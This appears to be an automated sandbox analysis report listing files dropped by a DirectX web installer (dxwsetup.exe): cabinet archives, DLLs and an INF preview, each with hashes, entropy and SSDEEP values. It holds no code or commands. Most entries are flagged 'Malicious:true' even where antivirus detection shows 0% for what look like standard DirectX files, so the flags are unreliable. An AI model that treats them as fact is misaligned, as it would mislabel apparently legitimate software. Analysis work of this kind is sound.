                                                                                              SSDEEP:3072:tG7RXkNHRrOaYVD5yEThWmLksx2MeEm6oOD4+3y20OXtGhlYRTPZDT5P/lJXptA:eX8KVD5yETfLksAMUHo4+T5IhlYRDZDy
                                                                                              MD5:001CFF513A31EE082133E7BA3B0D71A2
                                                                                              SHA1:4517610A25239A16C26CA9890E1F0E52DDA3781A
                                                                                              SHA-256:245B0C554CBE2677939A70E5C4C6666B1B43D10D47980223F8CDEADB2D0EB76B
                                                                                              SHA-512:7119F6CA16FE6D968310F34828F30D8144531B89583CFD529056D2E31D5164FC65136FA9015B69849F724EC641A9291AC644C91CC3FA8EBDD4DAF9CF5A665A7F
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 925511 bytes, 5 files, at 0x44 "D3DCompiler_43.dll" "D3DCompiler_43_x86.cat", flags 0x4, ID 10023, number 1, extra bytes 20 in head, 65 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):934679
                                                                                              Entropy (8bit):7.998315243107519
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:pOWjUzqd7URYQio4yGDUATxoWDYicd3qRbmXHphTheb:ptx6RYQiL1DUA7EicSbUJhIb
                                                                                              MD5:E7DFA140CB0AE502048ECDF1E42360E6
                                                                                              SHA1:4DB08318F78F076FCC6FF29737B3D6D676F59C54
                                                                                              SHA-256:293CED557AD732ABD2737333DF39B08216F31601D7AB65B743FE51B4EFB8B6F0
                                                                                              SHA-512:39B69A5CC4A50DE72D031C41879ED7644B577A9E3E3B44BFECC61D5312C7C32C964DC2CD37DB711F7E486F444CA77FE732C642F3E494E6DA1BC1CF774D9EF75C
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 756228 bytes, 5 files, at 0x44 "d3dcsx_43.dll" "d3dcsx_43_x86.cat", flags 0x4, ID 7878, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):765396
                                                                                              Entropy (8bit):7.996955154936438
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:C8Dx0/99rEneJVyrxcsaWmeUEEBTJNCK/FcZZXlewc3/2tqCyrIUl3z82ItDwh2Z:XDO19AVrRfEHNZWZrs3+ICyco3MDISTT
                                                                                              MD5:E34C0CF1BD5A68C80BDC709A452EB322
                                                                                              SHA1:4DD4553EC7E2E42D51A716B1F4CB58588BCAA164
                                                                                              SHA-256:799B517227812252481C9C9B22CF16FF185FFC20B9273612C8A37153B53AAD93
                                                                                              SHA-512:3488A52F6FD3681B10624546B923368245F969330D4909E91C5B58F159CD24B258A8A2274D62243CA5CA9F1FB40F9F248B3BD92283F775DD24BAF68ECC5FD03D
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191323 bytes, 5 files, at 0x44 "d3dx10_43.dll" "d3dx10_43_x86.cat", flags 0x4, ID 7293, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200491
                                                                                              Entropy (8bit):7.9966634458730566
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kD2Fju8h1xkWCD/5e8U2LK1aQAMxVz2aoOxoY4+ApyP0EwMGvFas+8QJgdBvCD7D:kwbCleyYagxVCaoV+ApcnG9aKQJaw/
                                                                                              MD5:591A61BD06C73C70F93DAC5AF2D8E924
                                                                                              SHA1:C9D36AC5E2ACAC31A7413D22ED1C09C71CC96FFB
                                                                                              SHA-256:F0BC06CEB484D97CF01526F9223DF7B4357D166C4391869F2E7D514DC1FE769B
                                                                                              SHA-512:3E2E3318A700A6ED82A21018403CA99728C8A56B7DF81F99A5D705B586CEE1141586DBF19A01EF1F1A72DDC8F45DDB51BA5769AE4634B02233EF1AC4E0FBA5D4
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 103485 bytes, 5 files, at 0x44 "d3dx11_43.dll" "d3dx11_43_x86.cat", flags 0x4, ID 7298, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):112653
                                                                                              Entropy (8bit):7.991810619702373
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tXMVzDTlrM28bEHSqgik2ono4DQQ/7cuBFbb9aD4:tXMxNjG4gikye5FBtBr
                                                                                              MD5:061BBA3836B3FFCBB01B150467BBE951
                                                                                              SHA1:00D8FBCD4068B3199D3D393BB4B86BF82985480D
                                                                                              SHA-256:B80DB68CD82CAF8BEDAEE62808171B20C546A76499C3AD53014E3BD2FBD2918D
                                                                                              SHA-512:AEC8327E1CCC0B33B3E32D66A5EE25C4B70A227B708D10F61EBAD2D998F3BE68145FA85C50BAA16A21EE766B336B1432FBEC02C75D698793092015C832B6FC26
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 762076 bytes, 5 files, at 0x44 "d3dx9_43.dll" "d3dx9_43_x86.cat", flags 0x4, ID 7093, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):771244
                                                                                              Entropy (8bit):7.999380380890997
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:E0b5pTUIVIRxV+yb+HJFnXQRGr85UpzQ3VztxmHN8DMFy0BJ1lSIug3SqHAlzJYf:l51NVO+XVLs3VztQHmYjBJb931I1NYI0
                                                                                              MD5:BF124B64FC3774F61D30DE0A405F0C6C
                                                                                              SHA1:2F8A8BABFA4E51555FCF125E8373D9C5F7F7434A
                                                                                              SHA-256:457C5CE48EAA0FE551B46DFFC1E4DCA985D261686D8D4E6BCED533EE1F682FCE
                                                                                              SHA-512:935922CE74BD399E8358693562F86C9B4B6308A6E33586A5DD61924F8B6B2CFD6CB2E472FD082B9EA32C0ABB9A799A0BA9103B4C316342F8072A7A3782C2116C
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1406942 bytes, 5 files, at 0x44 +A "d3dx9_31_x64.cat" +A "d3dx9_31.dll", flags 0x4, ID 6653, number 1, extra bytes 20 in head, 124 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1416110
                                                                                              Entropy (8bit):7.999689455720137
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:DapRo0d7USayTXsV6ZMwksqb7CL7eRS3OnQdPIKoQZvkGVOxtWcjxWO3ehFWG492:DU+0wyTXsMiw+OORhQRdZLdc1BehFV4g
                                                                                              MD5:EDBA7BC2A22F3186420C271B7291DCA3
                                                                                              SHA1:65483DB4269BE348528FD205239B811D775421CA
                                                                                              SHA-256:4F5CFFA56FD44F7775F12FC511A1E3F030C05AC78484F6866B12B82979067C22
                                                                                              SHA-512:90A9FDAD3D7F933DA8C3731E42D262034907D8088B85D7100BE46C57DEF02B436C31EB9FF144B9D67FD931F92A1677EC0CD762D9AAF066BB026F139499BA3A66
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176401 bytes, 6 files, at 0x44 +A "xact2_4_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):185569
                                                                                              Entropy (8bit):7.996440771278114
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:m3ZITAOIgaJqZazyaNuGKQb5aML7XTXM9+37VD5d58Oxz+oKG+ONa8bW9uMBowLB:iImMo2aHb0MvDn3jdhzWONFob
                                                                                              MD5:CC568D26B5B4CDA021D528CF75B21699
                                                                                              SHA1:DD47A33950C9E3A88DEFCAA7EA331FB1F1BBAB97
                                                                                              SHA-256:662D4E5D005CDBA02FABB0D7A68A7B48ECAFDEBE21718D892833D5C482E5ADD7
                                                                                              SHA-512:24B53BBD82DEC594D9909352D1F2AFE69B6F082DB99AAB3385826C4E8D22F5C075F3C5A24C8104DBEEF2D894980319AF141C65D768A51936C75092A846F3C8AA
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 132057 bytes, 5 files, at 0x44 +A "xact2_4_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):141225
                                                                                              Entropy (8bit):7.994197909856769
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:s0cnkrYXa8cJVIajswPlOA//GNzLriX5MMP6:s0OkrcajIaw+neN+XaMy
                                                                                              MD5:4FD2B859952C008DE0542053B15BF0D1
                                                                                              SHA1:0800CEC84B51FC6362C871FAB87A09DB5C4AD6D4
                                                                                              SHA-256:F6B6EBC9C239C5263AAFAA63FD691DA5AA715E9C794D5FD663E86559D5C6AE56
                                                                                              SHA-512:D656C3BFE4593EA9084A5D09F0173C8F6B7D6229FC7E3F6757AC03089CFA94A7337BBEF0456785B79D777B976F5A8259056D2DDCFE0F74D78C304A02BCEE0AD8
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1801048
                                                                                              Entropy (8bit):6.400511251324513
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
                                                                                              MD5:7672509436485121135C2A0E30B9E9FF
                                                                                              SHA1:F557022A9F42FE1303078093E389F21FB693C959
                                                                                              SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
                                                                                              SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):89944
                                                                                              Entropy (8bit):6.418506334480987
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gtBqvGpPmOEll4RWxiF9G3ZnVdqkFKJuTJbHo0Xm+jN3i97ZTj4FWMD+ZJqsHPCL:gtAvG5mOEll4Roi2pVVFKJuTVtXVpS9y
                                                                                              MD5:0A23038EA472FFC938366EF4099D6635
                                                                                              SHA1:6499D741776DC4A446C22EA11085842155B34176
                                                                                              SHA-256:8F2C455C9271290DCDE2F68589CF825F9134BEECB7E8B7E2ECBCABEAB792280A
                                                                                              SHA-512:DCC1C2EA86FD3A7870CD0369FA42F63D493895C546DCDD492EE19079A0D0696D689BBFE7B686D4FA549841896A54E673FC4581B80783D7AA255DFAD765B9DC88
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1801048
Entropy (8bit):6.400511251324513
Encrypted:false
SSDEEP:49152:RjnIXtNeOOOOOOOOOOOOOOOOOiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWeXiWI:5IjmY
MD5:7672509436485121135C2A0E30B9E9FF
SHA1:F557022A9F42FE1303078093E389F21FB693C959
SHA-256:D7EA3CF1B9B639010005E503877026597A743D1068AE6A453CE77CC202796FEA
SHA-512:E46FF68C4A532017F8AB15B1E46565508F6285B72C7A1CBE964ED5E75320C8E14587D01FEE61B3966F43636BFE74CEBD21F7665B4A726281E771CF9230E69863
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
Category:dropped
Size (bytes):100360
Entropy (8bit):7.9900557178400815
Encrypted:true
SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
MD5:4AFD7F5C0574A0EFD163740ECB142011
SHA1:3EBCA5343804FE94D50026DA91647442DA084302
SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Generic INItialization configuration [DXUpdate]
Category:dropped
Size (bytes):10910
Entropy (8bit):5.298492916268781
Encrypted:false
SSDEEP:192:8NV2ety7h+IZpt1eJ9NWzfxRaTwzxlWINXWgQ83HSbsO6ctIQbjQQZRJi6C+vP+6:8r2et2h+IZpt1eJ9NWjx4MzxlWINXWgq
MD5:7A83448F9110B8D6DE14B3C755B43F91
SHA1:B204E3B080CCE93C124FAFD3949839871382C904
SHA-256:C8C9283C824A57C1C1236F45DD51DBE9A59609076C636BBABFCAF187E4A10FF2
SHA-512:1620E3472D15525F6457F75AC986691AD37A1C2E0565031A34AB75BC5E9D1EC24B7F78A81EB64F1EE8A677F3C7F5D23151899643193788BC9E175BBCD0C61C5B
Malicious:false
Preview:[General]..Version=1..[DXUpdate]..Version=9,29,1962,0..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=100360,dxupdate.cab..[DXUpdate_Apr2006_xinput_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=49218,Apr2006_xinput_x86.cab..[DXUpdate_Apr2006_xinput_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=90309,Apr2006_xinput_x64.cab..[DXUpdate_Aug2006_xinput_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=49266,Aug2006_xinput_x86.cab..[DXUpdate_Aug2006_xinput_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=90350,Aug2006_xinput_x64.cab..[DXUpdate_Dec2006_d3dx10_x86]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=194952,Dec2006_d3dx10_00_x86.cab..[DXUpdate_Dec2006_d3dx10_x64]..Version=4,9,0,904..Locale=en..GUID={44BBA855-CC51-11CF-AAFA-00AA00B6015C}..URL0=216015,Dec2006_d3dx10_00_x64.cab..[DXUpdate
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
Category:dropped
Size (bytes):100360
Entropy (8bit):7.9900557178400815
Encrypted:true
SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
